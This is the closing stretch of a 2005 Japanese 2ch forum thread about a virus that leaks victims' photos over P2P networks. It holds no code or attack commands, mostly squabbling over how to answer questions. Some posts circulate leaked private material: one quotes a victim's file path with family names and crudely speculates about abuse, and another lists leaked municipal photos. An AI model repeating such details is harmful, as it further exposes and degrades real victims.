怪しげなexe(いかにもニュイルスだが、先生は反応しないようなブツ)を入手したら
そこらのUpロダにパスロックかけた上で開陳してくれ。俺、今ひまだし。

>>943
低レベル杉! 藻まいら THcomp --- Tower of Hanoi compress も知らんのか?

# なんなんだこれは.どんなファイルも1バイトになるぞ.
# どーなっとるんだ?
950[名無し]さん(bin+cue).rar:05/03/14 09:48:46 ID:cB96UYhP0
欄検眼段落としまくりんぐ
おもすれーーーーーー
951[名無し]さん(bin+cue).rar:05/03/14 10:12:39 ID:NKE1nbdx0
野村町消防団
欄検眼段_C__DOCUMENTS AND SETTINGS_ひで_MY DOCUMENTS_MY PICTURES_家_秀&幸江&ゆうこ 2003. 7.27_00015
これって娘とのハメ撮り?
足の位置を考えるとそう見える
952[名無し]さん(bin+cue).rar:05/03/14 10:50:16 ID:MxgcOpmo0
>>951
その2分前にはPCの前でピースしてる。
953[名無し]さん(bin+cue).rar:05/03/14 11:15:34 ID:lqzwOTXi0
感染したかどうすればわかるの?
954[名無し]さん(bin+cue).rar:05/03/14 11:19:02 ID:cB96UYhP0
このファイルおとして開いたからって
感染するわけじゃないんでしょ
955[名無し]さん(bin+cue).rar:05/03/14 12:16:00 ID:lqzwOTXi0
とっとと答えろや!ちんぽこんドモ!
956[名無し]さん(bin+cue).rar:05/03/14 12:22:30 ID:O3J3ec1r0
>>955
君には無理だな
957[名無し]さん(bin+cue).rar:05/03/14 12:30:58 ID:lqzwOTXi0
わからねぇヤツがエラそうにw
958[名無し]さん(bin+cue).rar:05/03/14 12:33:16 ID:vjPkOMYp0
>>950

お勧め教えろ。
959[名無し]さん(bin+cue).rar:05/03/14 12:34:09 ID:apyAoJGy0
一枚ここにうpしてくれ
960[名無し]さん(bin+cue).rar:05/03/14 13:18:33 ID:apyAoJGy0
誰か必要なコーデックを勝手に取りに行ってくれるようなワーム開発しろ
961[名無し]さん(bin+cue).rar:05/03/14 13:54:08 ID:uham/xQl0
GJBウイルスでわかった事はここにいる奴等は偉そうなこと言いながら
知識はほとんど無いってことだな。
サイインスコしろばっかw
頭わりーよ。
962[名無し]さん(bin+cue).rar:05/03/14 13:58:29 ID:NLrRBewd0
>>961
春厨キター
963[名無し]さん(bin+cue).rar:05/03/14 14:08:16 ID:0yb0wr8D0
欄検眼段、全部同じトリップの奴が流してるんだが
観戦してるのこいつだけか?
964[名無し]さん(bin+cue).rar:05/03/14 14:17:51 ID:bqgFaQNU0
ワラっていいのか?
965[名無し]さん(bin+cue).rar:05/03/14 14:32:00 ID:O3J3ec1r0
>>961
知識のないやつに説明するのはマンドクセ
知識のあるやつはそもそもここで質問しなくても解決する
よって、必然的に「再インスコしてこい」となるわけだ

>>963
ハハハ
966[名無し]さん(bin+cue).rar:05/03/14 14:36:23 ID:NLrRBewd0
>>963
キット作者ダヨ
967[名無し]さん(bin+cue).rar:05/03/14 14:50:56 ID:s5VIDvdt0
>>963
一人ってことないと思うんだが 感染したやつ全部同じトリであげられるんじゃねーのか?

つーか、欄検眼団って、PCに散乱したJPG画像を、手間かけることなくnyでupできる便利ツールってことで良いか?
968ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
969[名無し]さん(bin+cue).rar:05/03/14 15:06:16 ID:7V5P7ob50
>>967
PC内で忘れかけてたイイ画像が発掘できたりするからイイかもなー
970[名無し]さん(bin+cue).rar:05/03/14 15:15:53 ID:apyAoJGy0
普通にドライブ内.jpg検索でいいじゃん・・・・・・・・・・・
971[名無し]さん(bin+cue).rar:05/03/14 15:31:30 ID:J0PRdup60
欄検眼段で確認した分では秋田の自治体PC、その他大阪と広島の自治体か工事関係者の
仕事用写真(現場記録写真)。西日本の個人のプライベートエロと公民館写真。
オレが偶々なんかもしれないが、なんか市町村レベルの地方公共団体っぽいのが多い。
972[名無し]さん(bin+cue).rar:05/03/14 15:32:40 ID:4yyznytH0
973[名無し]さん(bin+cue).rar:05/03/14 15:34:12 ID:gVdVG+o70
>>972
作者乙
974[名無し]さん(bin+cue).rar:05/03/14 15:37:12 ID:3dJTKeed0
ひーでひーでひーでひーでひーで!
975[名無し]さん(bin+cue).rar:05/03/14 15:41:39 ID:Ga8JPmpe0
欄検眼段ってかなりの量が流れてるね。600M程落としたけどもう秋田
976[名無し]さん(bin+cue).rar:05/03/14 16:11:46 ID:NLrRBewd0
欄検眼段の作者がまたスレを立ておった
tmp4.2ch.net/test/read.cgi/download/1110716092/
977[名無し]さん(bin+cue).rar:05/03/14 16:21:41 ID:GSUnf5uJ0
存在しないウイルスの噂をでっち上げて、どれだけ流布できるか
実験してるグループがある、という仮説を覆す証拠マダー(チン
978[名無し]さん(bin+cue).rar:05/03/14 17:08:24 ID:Obpe7y/W0
>>965
おまいは何様だよ(# ゚Д゚)
わからない奴にわからせるように説明しろや!
それが真に知識を持ってる奴のすることだろ!

結局「再インスコ」しか言えない奴って他者とマトモなコミュニケーション
出来ないんだろ?それともただわからないだけとか?wだったらそう言えw
979[名無し]さん(bin+cue).rar:05/03/14 17:15:58 ID:8LaiycD10
>>978
つーか知識も何も実際その実行ファイルを手に入れて解析(動作確認でも良い)しないと
きちんと調べる事なんてできないだろ。未知のプログラムなんて実際に自分で見てみないと
はっきりした答えなんて言える訳がないだろ。質問するような奴が提供してくる情報なんて
不足してるだろうし何しろ正しいかどうかも分からないんだから答えようがねーだろ。
980[名無し]さん(bin+cue).rar:05/03/14 17:20:12 ID:usFV0WMt0
逆ギレしてる奴はよっぽど困ってるんだろうなw
981[名無し]さん(bin+cue).rar:05/03/14 17:22:46 ID:8LaiycD10
あと俺は>>965ではないが

>わからない奴にわからせるように説明しろや!
>それが真に知識を持ってる奴のすることだろ!
何を勘違いしてるんだか知らないけどここは学校じゃないですよ?
お前らも俺も「分からない時は聞きなさい」と言われて育てられたから
そう言いたくなる気持ちは分からないでもないけど知識を持ってる人は
先生じゃないんだから教えるも教えぬも自由。
答えるまでもない質問やあまりに初歩的な質問に答える気なんか沸か
ねーよ。例えば自分が自己解決したような質問なんか答える気0って
感じだな。

知識や経験や年齢を問わずネットユーザは皆同じに1ユーザなんだよ。
まずはネットマナーでも勉強したらどうかな?w
982[名無し]さん(bin+cue).rar:05/03/14 17:22:57 ID:O3J3ec1r0
>>978
仕事だったらやるけどな、そんな疲れる作業をする気はサラサラない。
983[名無し]さん(bin+cue).rar:05/03/14 17:23:53 ID:6wpDte7f0
だいぶお困りのようですね
984[名無し]さん(bin+cue).rar:05/03/14 17:25:59 ID:8LaiycD10
あとここで「どうせ知識ないんだろ」なんて煽ってる奴らは
自分で解決できないからって僻まないようにしてくれよw

つーかほんと自分のやってる事自体把握してなさそうな奴
ばかりじゃねーか。ただでさえブロードバンドが普及して
ネットの在り方なんてそっちのけの一般ユーザがP2Pに
舞い込んできてウザかったのにネットラ●ナーみたいな
雑誌が更に引きずり込んでくれたもんだからほんと今
最悪だな。
985[名無し]さん(bin+cue).rar:05/03/14 17:27:15 ID:H1MYOitZ0
結局は釣りなんだ 無視しようよ
986[名無し]さん(bin+cue).rar:05/03/14 17:38:37 ID:O3J3ec1r0
次スレの季節です。
987[名無し]さん(bin+cue).rar:05/03/14 17:40:58 ID:t00XwiH70
>>965 
おまいは何様だよ(#゚Д゚) 
わからない奴にわからせるように説明しろや! 
それが真に知識を持ってる奴のすることだろ! 

結局「再インスコ」しか言えない奴って他者とマトモなコミュニケーション 
出来ないんだろ?それともただわからないだけとか?wだったらそう言えw 




>>978の顔文字に余計なスペースがあったので直しといた
988[名無し]さん(bin+cue).rar:05/03/14 17:44:12 ID:HBNxN/VT0
次・ス・レ !!
次・ス・レ !!
989[名無し]さん(bin+cue).rar:05/03/14 17:45:39 ID:Z8KR+5MN0
>>987
ごめん、965じゃないけどお前の言うこと理解できない。
わかってるから面倒なんだよ。同じ事何度もそこら辺で言ってられるかっつーの。それこそ馬鹿だ。
知識を持ってる奴が「出来る事」であって「する(べき)事」ではないよ。
990[名無し]さん(bin+cue).rar:05/03/14 17:47:09 ID:apyAoJGy0
ここは新種のワーム&ウィルスのスレ
991[名無し]さん(bin+cue).rar:05/03/14 17:52:42 ID:uham/xQl0
ウイルスを解析しようって気概のある奴はいねーのなw
じゃあなんでここに来てるんだよおまえらw
992[名無し]さん(bin+cue).rar:05/03/14 17:57:56 ID:O3J3ec1r0
何か興味深いウイルスがでてくるかもしれない。
もしくはすごいマヌケに出会えるかもしれない。
993[名無し]さん(bin+cue).rar:05/03/14 18:00:14 ID:/8P+2cFm0
ニュイルススレなんだからニュイルスの情報があれば別に問題ないじゃん
994[名無し]さん(bin+cue).rar:05/03/14 18:01:40 ID:NLrRBewd0
次スレマダー?

緊急引越し先↓
[欄検眼段]新手のウイルス[GJB]
tmp4.2ch.net/test/read.cgi/download/1110716092/
995[名無し]さん(bin+cue).rar:05/03/14 18:02:08 ID:gVdVG+o70
>>991
貴殿は解析しようって気概があるようなので、頑張って解析してくれ。
996[名無し]さん(bin+cue).rar:05/03/14 18:02:38 ID:apyAoJGy0
httpつけろ
997[名無し]さん(bin+cue).rar:05/03/14 18:02:51 ID:cyZ+32Wg0
知っているがお前の態度が気に入らない
998[名無し]さん(bin+cue).rar:05/03/14 18:03:15 ID:Obpe7y/W0
ははは
999[名無し]さん(bin+cue).rar:05/03/14 18:03:52 ID:apyAoJGy0
999
1000[名無し]さん(bin+cue).rar:05/03/14 18:04:00 ID:apyAoJGy0
1000
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。